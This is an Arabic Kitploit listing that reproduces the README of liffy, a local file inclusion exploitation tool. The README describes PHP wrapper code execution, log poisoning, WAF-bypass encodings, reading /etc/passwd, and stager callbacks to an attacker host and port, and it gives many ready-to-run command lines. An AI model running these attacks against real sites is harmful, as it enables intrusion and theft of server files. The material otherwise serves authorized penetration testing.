Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
liffy — أداة استغلال تضمين الملفات المحلية | Kitploit
أدوات/GitHubGitHub/mzfr/liffy
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات
GitHubmzfr/liffy

liffy

أداة استغلال تضمين الملفات المحلية

عرض المستودع
978114منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GitSpo Mentions License: GPL v3 Maintenance Rawsec's CyberSecurity Inventory

Packaging status


liffy

أداة متطورة لاستغلال ثغرة تضمين الملفات المحلية (LFI)

liffy in action

أداة بايثون قوية لاستغلال ثغرة تضمين الملفات المحلية (LFI) مع ميزات متقدمة تشمل تجاوز جدار الحماية (WAF)، وتقنيات الترميز، وكشف شامل للثغرات.

Liffy v2.0 هي النسخة المحسّنة بشكل كبير من liffy التي تم إنشاؤها أصلاً بواسطة rotlogix/liffy. تتضمن هذه النسخة ميزات حديثة مثل إخراج الطرفية الغني (Rich terminal)، وتكوين YAML، وتحسين تعدد الخيوط، والعديد من تقنيات الاستغلال المتقدمة.

⚠️ تمت كتابة الكثير من التغييرات الجديدة بطريقة "vibe coding".

جدول المحتويات

  • الميزات
  • التثبيت
  • الاستخدام
  • التكوين
  • التقنيات المتقدمة
  • أمثلة
  • المساهمة
  • الإسناد

الميزات

تقنيات LFI الأساسية

  • data:// - تنفيذ الأكواد عبر الغلاف data
  • expect:// - تنفيذ الأكواد عبر الغلاف expect
  • input:// - تنفيذ الأكواد عبر الغلاف input
  • filter:// - قراءة الملفات التعسفية عبر الغلاف filter
  • /proc/self/environ - تنفيذ الأكواد في وضع CGI
  • تسميم سجل Apache access.log - استغلال سجلات الملفات
  • تسميم سجل auth.log SSH في لينكس - استغلال سجلات SSH
  • تسميم البايت الفارغ (Null Byte Poisoning) - هجمات البايت الفارغ القديمة في PHP
  • استغلال غلاف ZIP - هجمات تضمين ملفات ZIP
  • كشف الأغلفة - اختبارات آمنة لأغلفة تيار LFI الشائعة
  • اختبارات خارج النطاق (Out-of-band) - حمولات رد اتصال لسلوك الأغلفة العمياء أو SSRF
  • فحوصات LFI العمياء - اختبارات فرق الاستجابة عندما لا تنعكس محتويات الملف
  • وضع الفحص التلقائي - خطة فحص آمنة تعتمد على الكشف المسبق عبر التنقل في المسارات والأغلفة والفحوصات العمياء

الميزات المتقدمة

  • تجاوز جدار الحماية (WAF Evasion) - تقنيات متعددة لتجاوز جدران الحماية الشائعة
  • الترميز المتقدم - ترميز URL مزدوج، Unicode، اختلافات حالة الأحرف
  • دعم طلبات POST - دعم كامل لطريقة POST مع بيانات مخصصة
  • رؤوس مخصصة - رؤوس HTTP قابلة للتكوين
  • تدوير User-Agent - عوامل مستخدم عشوائية لتجنب الكشف
  • تحديد المعدل (Rate Limiting) - تقييد الطلبات قابل للتكوين
  • تعدد الخيوط - إدارة محسنة لمجموعة الخيوط
  • وضع الكشف - فحص الثغرات دون استغلال
  • إخراج طرفية غني - إخراج ملون جميل مع أشرطة تقدم
  • تكوين YAML - إدارة إعدادات دائمة

التحسينات الحديثة

  • كشف الثغرات المحسّن - تحليل متقدم للاستجابة مع تسجيل الثقة
  • إدارة مجموعة الخيوط - أداء محسّن مع خيوط تكيفية
  • إدارة التكوين - إعدادات قائمة على YAML مع تجاوزات CLI
  • تسجيل شامل - تقارير تنفيذ مفصلة وتتبع التقدم

التثبيت

تأكد من استخدام Python 3. لا يدعم Liffy Python 2. الأمثلة أدناه تستخدم uv run python لتشغيل الأوامر داخل بيئة المشروع.

root@kitploit:~
# قم بتثبيت uv إذا لم يكن مثبتاً لديك
curl -LsSf https://astral.sh/uv/install.sh | sh

# استنساخ المستودع
git clone https://github.com/mzfr/liffy
cd liffy

# إنشاء بيئة افتراضية باستخدام uv
uv venv

# تثبيت التبعيات من pyproject.toml
uv sync

# تشغيل liffy
uv run python liffy.py --help

الاستخدام

الصيغة الأساسية

root@kitploit:~
uv run python liffy.py <URL> [OPTIONS]

خيارات سطر الأوامر

root@kitploit:~
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
                [-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
                [--detection] [--null-byte] [--zip] [--encoding]
                [--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
                [--headers HEADERS] [--lhost LHOST] [--lport LPORT]
                [--read-file READ_FILE] [-y] [--timeout TIMEOUT]
                [--proxy PROXY] [--verify-tls] [--user-agent USER_AGENT]
                [--oob] [--oob-url OOB_URL] [--blind] [--auto]
                [--delay DELAY] [--retries RETRIES] [--json] [--output OUTPUT]
                [--quiet] [--no-color] [--no-banner] [--config]
                [url]

positional arguments:
  url                   عنوان URL لاختبار LFI

تقنيات أساسية:
  -d, --data            استخدام تقنية data://
  -i, --input           استخدام تقنية input://
  -e, --expect          استخدام تقنية expect://
  -f, --filter          استخدام تقنية filter://
  -p, --proc            استخدام تقنية /proc/self/environ
  -a, --access          استخدام تقنية سجلات Apache access
  --ssh                 تسميم سجل auth SSH
  -dt, --directorytraverse  اختبار التنقل في الدليل (Directory Traversal)
  --null-byte           اختبار تسميم البايت الفارغ (Null Byte Poisoning)
  --zip                 اختبار استغلال غلاف ZIP
  --wrappers, --wrapper كشف أغلفة تيار LFI الشائعة
  --wrapper-list WRAPPER_LIST
                        مسار قائمة حمولات اختبار الأغلفة المخصصة
  --oob                 إرسال اختبارات رد اتصال خارج النطاق (OOB)
  --oob-url OOB_URL     عنوان URL الأساسي لرد اتصال OOB
  --blind               تشغيل فحوصات فرق استجابة LFI العمياء
  --blind-list BLIND_LIST
                        مسار قائمة اختبارات LFI العمياء المخصصة
  --auto                تشغيل خطة فحص تلقائي آمنة

خيارات متقدمة:
  --encoding            استخدام تقنيات ترميز/تجاوز متقدمة
  --waf-bypass          استخدام تقنيات تجاوز جدار الحماية (WAF)
  --method {GET,POST}   طريقة HTTP المستخدمة (الافتراضي: GET)
  --post-data POST_DATA بيانات POST (التنسيق: key=value&key2=value2)
  --headers HEADERS     رؤوس مخصصة (التنسيق: Header1:Value1,Header2:Value2)
  --detection           تنفيذ كشف LFI فقط، بدون استغلال

خيارات الطلب:
  --timeout TIMEOUT     مهلة طلب HTTP بالثواني
  --proxy PROXY         عنوان URL لوكيل HTTP(S)، مثلاً http://127.0.0.1:8080
  --verify-tls          التحقق من شهادات TLS بدلاً من استخدام طلبات غير آمنة
  --user-agent UA       رأس User-Agent مخصص
  --delay DELAY         التأخير بين الطلبات بالثواني
  --retries RETRIES     عدد إعادة محاولات HTTP لكل طلب

خيارات الأتمتة:
  --lhost LHOST         مضيف رد الاتصال للحمولات المجزأة
  --lport LPORT         منفذ رد الاتصال للحمولات المجزأة
  --read-file PATH      مسار الملف للقراءة باستخدام filter://
  -y, --yes             استخدام القيم الافتراضية للمطالبات والتشغيل غير التفاعلي
  --json                طباعة ملخص JSON للتشغيل
  --output OUTPUT       كتابة ملخص JSON إلى ملف
  --quiet               إخفاء الإخراج الطرفي العادي

خيارات عامة:
  -ns, --nostager       تنفيذ الحمولة مباشرة، دون استخدام stager
  -r, --relative        استخدام تسلسلات التنقل في المسار للهجوم
  -l, --location LOCATION  مسار الملف الهدف (سجل الوصول، سجل المصادقة، إلخ.)
  --cookies COOKIES     ملفات تعريف الارتباط للجلسة للمصادقة
  -t, --threads THREADS عدد الخيوط المستخدمة (الافتراضي: 5)
  --no-color            تعطيل الإخراج الملون
  --no-banner           تعطيل عرض الشعار
  --config              إنشاء ملف تكوين YAML افتراضي

التكوين

تكوين YAML

أنشئ ملف تكوين للإعدادات الدائمة:

root@kitploit:~
uv run python liffy.py --config

يقوم هذا بإنشاء liffy_config.yaml بالإعدادات الافتراضية:

root@kitploit:~
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
quiet: false
default_method: GET
user_agent_rotation: true
request_timeout: 15
proxy: null
verify_tls: false
retries: 0

قم بتعيين disable_banner: true لإخفاء شعار/شاشة البداية افتراضياً. لا تزال أعلام CLI تتجاوز قيم التكوين، لذا يمكنك أيضاً استخدام --no-banner أو --no-color أو --quiet للتشغيلات الفردية.

متغيرات البيئة

يمكنك أيضاً استخدام متغيرات البيئة:

  • LIFFY_THREADS - عدد الخيوط
  • LIFFY_RATE_LIMIT - تأخير تحديد المعدل
  • LIFFY_NO_COLOR - تعطيل الألوان (true/false)

التقنيات المتقدمة

تقنيات تجاوز جدار الحماية (WAF)

عند تمكين --waf-bypass، يطبق liffy تلقائياً تقنيات متعددة للتهرب:

  • حقن التعليقات: /**/, #, ;
  • الخلط في البروتوكول: file:///, pHp://
  • طبقات الترميز: مجموعات ترميز متعددة
  • إخفاء المسار: ./, ../, بايتات فارغة

تقنيات تجاوز الترميز

مع --encoding، يطبق liffy طرق ترميز متقدمة:

  • ترميز URL مزدوج: %252e%252e%252f
  • ترميز Unicode: \u002e\u002e\u002f
  • حالة مختلطة: ..%2F, ..%2f
  • ترميز كيان HTML: &#46;&#46;&#47;

دعم طلبات POST

root@kitploit:~
# POST مع بيانات النموذج
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"

# POST مع رؤوس مخصصة
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"

ضبط الطلبات

root@kitploit:~
# إرسال حركة المرور عبر وكيل محلي وإعادة محاولة حالات الفشل المؤقتة
uv run python liffy.py "http://target.com/lfi.php?file=" -d \
  --proxy "http://127.0.0.1:8080" --timeout 20 --retries 2

# استخدام User-Agent ثابت وتأخير طلب مخصص
uv run python liffy.py "http://target.com/lfi.php?file=" --detection -f \
  --user-agent "liffy/2.0" --delay 0.5

أمثلة

اختبار LFI أساسي

اختبار باستخدام غلاف data://

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d

اختبار باستخدام تقنيات متعددة

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -i -e -f

وضع الكشف فقط

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -d -i -e

استخدام متقدم

تجاوز WAF مع الترميز

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encoding

متعدد الخيوط مع تحديد المعدل

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -t 10 --config

طلب POST مع رؤوس مخصصة

root@kitploit:~
uv run python liffy.py "http://example.com/upload.php" -d --method POST \
  --post-data "action=read&file=../../etc/passwd" \
  --headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"

تسميم السجلات (Log Poisoning)

تسميم سجل Apache access.log

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a

تسميم سجل auth.log SSH

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --ssh

موقع سجل مخصص

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"

التنقل في الدليل (Directory Traversal)

تنقل المسار النسبي

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -r

اختبار التنقل في الدليل

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -dt

تقنيات خاصة

تسميم البايت الفارغ (Null Byte Poisoning) (PHP قديم)

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --null-byte

استغلال غلاف ZIP

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --zip

كشف الأغلفة الشائعة

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrappers

يستخدم كشف الأغلفة اختبارات افتراضية آمنة لـ file:// و php://filter و data:// و php://temp و php://memory والأغلفة ذات الصلة. يتم التعامل مع zip:// و phar:// و glob:// كمعلوماتية/شرطية لأنها تتطلب عادةً ملفات من الجانب الهدف أو سلوكاً يكشف قوائم.

يمكنك تقديم قائمة حمولات أغلفة مخصصة. إذا تم حذف --wrapper-list، يعود liffy إلى الاختبارات المضمنة:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrapper \
  --wrapper-list payload_wordlists/wrappers.txt

يمكن أن يكون كل سطر غير فارغ إما حمولة خام أو name=payload:

root@kitploit:~
php-filter-passwd=php://filter/read=convert.base64-encode/resource=/etc/passwd
file-winini=file:///c:/windows/win.ini

اختبارات رد اتصال خارج النطاق (OOB)

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --oob \
  --oob-url "https://example.oast.site"

استخدم هذا مع مستمع رد اتصال HTTP/DNS. يرسل Liffy حمولات من نوع غلاف URL وتتحقق مما إذا كان الهدف يرجع الاتصال.

فحوصات LFI العمياء

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind

تقارن الفحوصات العمياء اختبارات الملفات الموجودة مقابل خطوط أساس ملفات مفقودة عشوائية وتبلغ عن اختلافات الحالة أو الطول أو التوقيت عندما لا ينعكس المحتوى مباشرة.

يمكنك تقديم قائمة اختبارات عمياء مخصصة. إذا تم حذف --blind-list أو كان فارغاً، يستخدم liffy الاختبارات المضمنة:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind \
  --blind-list payload_wordlists/blind_lfi.txt

يمكن أن يكون كل سطر غير فارغ إما حمولة خام أو name=payload:

root@kitploit:~
linux-passwd=/etc/passwd
proc-environ=/proc/self/environ
laravel-env=.env

فحص تلقائي آمن

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --auto

--auto يمكّن التنقل في الدليل (كشف فقط)، وفحوصات الأغلفة، والفحوصات العمياء. إذا تم توفير --oob-url أيضاً، فإنه يتضمن اختبارات OOB.

فحص شامل بجميع التقنيات

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" \
  -d -i -e -f -p -a --ssh -dt --null-byte --zip --wrappers --blind \
  --encoding --waf-bypass --detection

المصادقة وملفات تعريف الارتباط (Cookies)

استخدام ملفات تعريف الارتباط للجلسة

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --cookies "PHPSESSID=abc123; auth_token=xyz789"

استخدام نصي / غير تفاعلي

تقديم قيم رد الاتصال دون مطالبات

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --lhost 10.10.14.2 --lport 4444 --yes

قراءة ملف معين باستخدام filter:// دون مطالبة

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -f \
  --read-file /etc/passwd --yes

إخراج منظم

طباعة ملخص JSON للتشغيل

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --json

كتابة ملخص JSON إلى قرص مع الاحتفاظ بالإخراج الطرفي

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f \
  --output findings.json

التحكم في الإخراج

تعطيل الألوان والشعار

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --no-color --no-banner

إخفاء الإخراج الطرفي العادي

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --quiet --output findings.json

مواقع الملفات الافتراضية

يتم استخدام المواقع الافتراضية التالية عندما لا يتم تحديد مسار مخصص:

  • SSH auth.log: /var/log/auth.log
  • Apache access.log: /var/log/apache2/access.log
  • سجل Apache البديل: /var/log/httpd/access_log

المساهمة

نرحب بالمساهمات! إليك كيف يمكنك المساعدة:

اقتراحات الميزات

  • تقنيات استغلال LFI جديدة
  • طرق إضافية لتجاوز WAF
  • تقنيات ترميز محسّنة
  • تحسين الحمولات
  • تحسينات الكشف

تقارير الأخطاء

  • أبلغ عن المشكلات عبر GitHub Issues
  • قم بتضمين خطوات إعادة الإنتاج التفصيلية
  • قدم تفاصيل البيئة المستهدفة

طلبات السحب (Pull Requests)

  • استنساخ المستودع
  • إنشاء فرع ميزة
  • إجراء تغييراتك مع الاختبارات
  • تقديم طلب سحب

لا تتردد في فتح مشكلة لأي أسئلة أو اقتراحات!

كشف الثغرات

يوفر وضع الكشف في Liffy تحليلاً شاملاً للثغرات:

تسجيل الثقة (Confidence Scoring)

  • ثقة عالية (80-100%): مؤشرات قوية مثل محتوى /etc/passwd
  • ثقة متوسطة (50-79%): محتوى ملف جزئي أو استجابات مشبوهة
  • ثقة منخفضة (20-49%): مؤشرات محتملة تتطلب تحققاً يدوياً

ميزات الكشف

  • تحليل محتوى الملف: يتعرف على أنماط ملفات Linux وWindows وPHP
  • تحليل الاستجابة: رموز حالة HTTP، طول المحتوى، تحليل التوقيت
  • كشف WAF: يحدد توقيعات جدران الحماية الشائعة
  • جمع الأدلة: يلتقط دليلاً على الثغرة لإعداد التقارير

نموذج إخراج الكشف

root@kitploit:~
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
    Payload: ../../etc/passwd
    Confidence: 85%
    Evidence: Linux /etc/passwd file: root:
    Status Code: 200
    Content Length: 1547

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

حظر الطلبات بواسطة WAF

root@kitploit:~
# استخدام تقنيات تجاوز WAF
uv run python liffy.py "http://target.com/lfi.php" -d --waf-bypass

# تقليل عدد الخيوط وزيادة التأخيرات
uv run python liffy.py "http://target.com/lfi.php" -d -t 1

مشكلات تحديد المعدل

root@kitploit:~
# زيادة التأخير في ملف التكوين
max_threads: 2
rate_limit_delay: 1.0

وضع التصحيح (Debug Mode)

للإخراج المفصل، يمكنك تعديل التكوين:

root@kitploit:~
debug_mode: true
verbose_output: true

إشعار أمني

تم تصميم Liffy لاختبارات الأمان المصرح بها فقط.

  • استخدمه فقط على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها
  • اتبع ممارسات الإفصاح المسؤول
  • احترم حدود المعدل وتجنب حالات تعطيل الخدمة (DoS)
  • كن على دراية بالآثار القانونية في منطقتك

المؤلفون ليسوا مسؤولين عن إساءة استخدام هذه الأداة.

الإسناد

الإلهام الأصلي

  • liffy الأصلي بواسطة hvqzao
  • المفهوم الأولي من rotlogix/liffy

التقنيات والبحث

  • تقنيات استغلال LFI من أبحاث أمنية متنوعة
  • طرق تجاوز WAF من موارد أمان عامة
  • توثيق استغلال أغلفة PHP

التصميم والأصول

  • تصميم الشعار من renderforest
  • تنسيق الطرفية باستخدام مكتبة Rich

الترخيص

هذا المشروع مرخص بموجب رخصة GNU General Public License v3.0 - راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة